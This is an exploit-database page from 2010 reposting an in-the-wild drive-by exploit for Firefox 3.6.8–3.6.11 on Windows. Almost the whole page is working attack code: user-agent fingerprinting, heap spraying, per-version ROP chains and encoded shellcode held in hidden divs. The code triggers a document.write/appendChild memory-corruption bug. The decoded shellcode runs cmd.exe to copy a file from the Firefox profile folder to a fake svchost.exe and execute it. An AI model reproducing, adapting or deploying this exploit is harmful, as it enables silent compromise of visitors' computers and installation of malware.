Home / os / win7

[remote exploits] - Firefox 3.6.8 - 3.6.11 Interleaving docu

Posted on 29 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild by unknown in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>==================================================================
Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild
==================================================================

&lt;!--
 
WARNING! This is exploit code from the wild.  The original first 2 unicode chars at &#039;id=sun8&#039; were ub8acu1029. Use, as always, at your own risk.
 
&lt;body&gt;
&lt;div style=&quot;visibility:hidden;width:0px;height:0px&quot;&gt;
&lt;div id=sun8&gt;uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002&lt;/div&gt;
&lt;div id=sun9&gt;uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000uef51u100au0001u0000uef51u100au0000u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001uce22u1003u57A8u0d78u5500u1001u57A8u0d78ud761u1004&lt;/div&gt;
&lt;div id=sun10&gt;uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u0011u0000u1FC7u1052u0300u7FFEuFD6Du1001uA173u1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u20F0u1011u0001u0000u20F0u1011u0000u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u9405u1003u57A8u0d78u1FC7u1052u57A8u0d78uFD6Du1001&lt;/div&gt;
&lt;div id=sun11&gt;u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc7u1000u0011u0000u827fu1000u0300u7FFEucda3u1000u6689u1000uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u4bc7u1000u0001u0000u4bc7u1000u0000u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000&lt;/div&gt;
&lt;div id=suv&gt;uEC81u0120u0000uFC8BuC783uC704u3207u9174uC70Cu0447u138EuAC0Au47C7u3908u7DE2uC783u0C47u65A0uCB97u47C7u9310uE432uC794u1447uD550uCB9Bu47C7u4318uACBEuC7DBu1C47u36B2u130Fu47C7uC420u1F8DuC774u2447u2F51u01A2u47C7u5728u0D66uC7FFu2C47u879BuE58Bu47C7uED30uFFAFuC7B4u3447u19C2u014Bu47C7u7D38uA5F0uC79Au3C47u2BE4uC594u47C7uEC40u5F9DuC7A4u4447uD680u9AAFu8DE9u0000u3300u64C0u30A1u0000u8B00u0C40u408Bu8B14u8B00u8B00u1040uE88BuF78Bu116AuE859u0027u0000uF9E2u6DEBu8B5Bu6AEEu5300u55FFu6424u00A1u0000uC700u0440u0000u0000u00C7u0000u0000u00B8u0000uFF00u51E0u8B56u3C75u748Bu782EuF503u8B56u2076uF503uC933u4149u03ADu33C5u0FDBu10BEuD63Au0874uCBC1u0307u40DAuF1EBu1F3BuE775u8B5Eu245EuDD03u8B66u4B0Cu5E8Bu031Cu8BDDu8B04uC503u5EABuC359u6EE8uFFFFuE8FFuFF8EuFFFFu6D63u2E64u7865u2065u632Fu4620u524Fu2F20u2052u2522u5355u5245u5250u464Fu4C49u2545u4C5Cu636Fu6C61u5320u7465u6974u676Eu5C73u7041u6C70u6369u7461u6F69u206Eu6144u6174u4D5Cu7A6Fu6C69u616Cu465Cu7269u6665u786Fu505Cu6F72u6966u656Cu5C73u2022u6925u4920u204Eu2A28u2029u4F44u6920u2066u7E25u697Au6520u7571u2020u3834u3436u2030u6320u646Du652Eu6578u2F20u2063u6F63u7970u2220u6925u2022u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u2022u792Fu2620u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u0022uffffuffffuffffuffff&lt;/div&gt;
&lt;/div&gt;
&lt;body&gt;
&lt;script src=scvhost.txt&gt;&lt;/script&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function check(){
    var temp=&quot;&quot;;
    var user=navigator.userAgent.toLowerCase();
    var a=user.indexOf(&quot;windows nt 6.1&quot;);
    var b=user.indexOf(&quot;windows nt 6.0&quot;);
    var c=user.indexOf(&quot;firefox/3.6.8&quot;);
    var d=user.indexOf(&quot;firefox/3.6.9&quot;);
    var e=user.indexOf(&quot;firefox/3.6.10&quot;);
    var f=user.indexOf(&quot;firefox/3.6.11&quot;);
    if(a==-1&amp;&amp;b==-1&amp;&amp;c!=-1&amp;&amp;d==-1&amp;&amp;e==-1&amp;&amp;f==-1){
        temp=&quot;8&quot;;
    }
    else if(a==-1&amp;&amp;b==-1&amp;&amp;c==-1&amp;&amp;d!=-1&amp;&amp;e==-1&amp;&amp;f==-1){
        temp=&quot;9&quot;;
    }
    else if(a==-1&amp;&amp;b==-1&amp;&amp;c==-1&amp;&amp;d==-1&amp;&amp;e!=-1&amp;&amp;f==-1){
        temp=&quot;10&quot;;
    }
    else if(a==-1&amp;&amp;b==-1&amp;&amp;c==-1&amp;&amp;d==-1&amp;&amp;e==-1&amp;&amp;f!=-1){
        temp=&quot;11&quot;;
    }
    else {
        return temp=&quot;0&quot;;
    }
    return temp;
     
}
function de(su){
    var i;var sun = &quot;&quot;;
    for (i = 0; i &lt; su.length; i++){
        sun += String.fromCharCode(parseInt(su[i], 16));
        }
    return unescape(sun);
}
function code(beastk){
    var nop = &quot;&quot;;
    var len = beastk.length;
    for (i = 0; i &lt; len;) {
        nop = nop + &quot;m&quot; + beastk.substring(i, i + 5);
        i = i + 5;
    }
    nop = nop.split(&quot;m&quot;).toString();
    var temp = new Array();
    for (j = 0; j &lt; nop.length; j++) {
        if (nop.charCodeAt(j).toString(16) == &quot;2c&quot;) {
            temp.push(&quot;25&quot;);
        }
        else {
            temp.push(nop.charCodeAt(j).toString(16));
        }
    }
    return de(temp);
}
function getatts(str){
    var cobj=document.createElement(str);
    cobj.id=&quot;testcase&quot;;
    document.body.appendChild(cobj);
    var obj=document.getElementById(&quot;testcase&quot;);
    var atts = new Array();
    for(p in obj){
        if(typeof(obj[p])==&quot;string&quot;){
          atts.push(p);
        }
    }  
    document.body.removeChild(cobj);
    return atts;
}
var ck=check();
var bk=&quot;mp.ojsyex5&quot;;
var array = new Array();
var ls = 0x100000-(bk.length*2+0x01020);
var b1 =&quot;&quot;;//////////////////////111111111111111111111111111111
if (ck == &quot;0&quot;) {
    location.href = &quot;about:blank&quot;;
}
else {
 
        if(ck==&quot;8&quot;){
            b1=code(&quot;u0d0du0d0d&quot;);
            }
        if(ck==&quot;9&quot;){
            b1=code(&quot;uef52u100a&quot;);
            }
        if(ck==&quot;10&quot;){
            b1=code(&quot;ub8b7u1029&quot;);
            }
        if(ck==&quot;11&quot;){
            b1=code(&quot;u4bc8u1000&quot;);
        }
 
    var b = b1;
    while (b.length &lt; (0x85750 - 0x1000) / 2) {
        b += b1
    };
     
    ///////////////////////////////2222222222222222222
    var sun=&quot;&quot;;
    var sun8 = document.getElementById(&quot;sun8&quot;).innerHTML;
    var sun9 = document.getElementById(&quot;sun9&quot;).innerHTML;
    var sun10 = document.getElementById(&quot;sun10&quot;).innerHTML;
    var sun11 = document.getElementById(&quot;sun11&quot;).innerHTML;
    var suv = document.getElementById(&quot;suv&quot;).innerHTML;
    if(ck==&quot;8&quot;){
            sun=sun8;
            }
    if(ck==&quot;9&quot;){
            sun=sun9;
            }
    if(ck==&quot;10&quot;){
            sun=sun10;
            }
    if(ck==&quot;11&quot;){
            sun=sun11;
            }      
    b += code(sun + suv);
    for (u = 0; u &lt; 8; u++) {
        b1 += b1;
    }
    while (b.length &lt; ls) {
        b += b1;
    }
    var lh = b.substring(0, ls / 2);
    b = &quot;&quot;;
    for (i = 0; i &lt; 0x200; i++) {
        array[i] = lh + bk;
    }
    ////////////////////////////////////333333333333
    if(ck==&quot;8&quot;){
        b1=code(&quot;ub8a7u1029&quot;);
    }
    if(ck==&quot;9&quot;){
        b1=code(&quot;uab07u1006&quot;);
    }
    if(ck==&quot;10&quot;){
        b1=code(&quot;u8247u1009&quot;);
    }
    if(ck==&quot;11&quot;){
        b1=code(&quot;uf7e7u1017&quot;);
    }
    for (i = 0; i &lt; 16; i++) {
        b1 += b1;
    }
    b = b1;
    while (b.length &lt; ls) {
        b += b1;
    }
    lh = b.substring(0, ls / 2);
    b = &quot;&quot;;
    for (i = 0x200; i &lt; 0x500; i++) {
        array[i] = lh + bk;
    }
     
    var tags = new Array(&quot;audio&quot;, &quot;a&quot;, &quot;base&quot;);
    for (inx = 0; inx &lt; 0x8964; inx++)
        for (i = 0; i &lt; tags.length; i++) {
            var atts = getatts(tags[i]);
            for (j = 0; j &lt; atts.length; j++) {
                var html = &quot;&lt;&quot; + tags[i] + &quot; &quot; + atts[j] + &quot;=a&gt;&lt;/&quot; + tags[i] + &quot;&gt;&quot; + tags[i];
                document.write(html);
            }
        }
}
&lt;/script&gt;--&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-29]</pre></body></html>

 

TOP